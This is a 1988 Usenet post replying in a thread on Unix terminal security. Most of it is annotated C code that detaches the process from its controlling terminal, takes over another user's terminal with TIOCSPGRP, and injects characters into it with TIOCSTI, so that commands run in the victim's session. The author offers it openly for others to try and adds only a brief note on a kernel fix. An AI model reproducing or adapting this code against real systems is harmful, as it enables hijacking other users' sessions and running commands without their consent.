Xref: utzoo news.groups:6317 news.sysadmin:1655
Path: utzoo!attcan!uunet!mcvax!unido!tub!tmpmbx!csch
From: csch@tmpmbx.UUCP (Clemens Schrimpe)
Newsgroups: news.groups,news.sysadmin
Subject: Re: who, me?
Keywords: security, virus, summer job
Message-ID: <1362@tmpmbx.UUCP>
Date: 20 Nov 88 01:33:47 GMT
References: <247@aplcen.apl.jhu.edu  <2975@ci.sei.cmu.edu>
Reply-To: csch@tmpmbx.UUCP (Clemens Schrimpe)
Organization: netmbx GbR, Berlin
Lines: 64

pdb@sei.cmu.edu (Patrick Barron) writes:
<> You can't necessarily TIOCSTI a terminal if you can write to it.  TIOCSTI
<> only works if 1) the terminal in question is your process's control terminal,
<> or 2) you're root.
Ha! 1) isn't that hard - at least under 4.2 (I don't know, whether that has
been fixed under 4.3) you can SET your own processgroup-terminal relation-
ship und thus use TIOCSTI ! (TIOCSPGRP)
Although many cuys will cry out, here's a little example:
[There is a "security" check in the TIOCSTI-code, which will only allow
 execution of TIOCSTI when the terminal is WRITABLE - simply change this
 to check if the terminal is READABLE and the following won't work]

|	close(0); close(1); close(2);
Close file-descriptors to controlling-tty

|	signal(SIGTTOU, SIG_IGN);
|	signal(SIGTTIN, SIG_IGN);
Ignore these fancy signals ... (will else receive them, when writing
to the victim's terminal)

|	if ((fd1 = open("/dev/tty", O_RDWR)) >= 0) {
|		ioctl(fd1, TIOCNOTTY, 0);
|		close(fd1);
|	}
Get rid of our processgroup<->terminal relationship (divorce ??? :-)

|	if ((fd = open(argv[1], O_WRONLY)) < 0)
|	{
|		perror(argv[1]);
|		exit(1);
|	}
Open victim's terminal ...

|	new = getpid();
|	if (ioctl(fd, TIOCSPGRP, &new) < 0)
|	{
|		perror("TIOCSPGRP");
|		exit(1);
|	}
Change the processgroup of the victim's terminal

|	while (*c)
c is a pointer to the string to be written to his/her terminal

|		if (ioctl(fd, TIOCSTI, c++) < 0)
|		{
|			perror("TIOCSTI");
|			exit(1);
|		}
|	ioctl(fd, TIOCSTI, "\r");
|	close(fd);

NO FLAMES PLEASE !
Try playing with it ... :-)

	Clemens

PS: Thanks to cabo@tub for many hints about this ...
--
UUCP:	csch@tmpmbx.UUCP	{pyramid,unido,altger}!tmpmbx!csch
BITNET:	csch@db0tui6.BITNET	ARPA/NSF: csch@garp.mit.edu
PHONE:	+49-30-332 40 15	TELEX:	186672 net d
PSI:	PSI%026245300043106::CSCH
X.25:	2624 53000 43106	login: chat	or	login: mail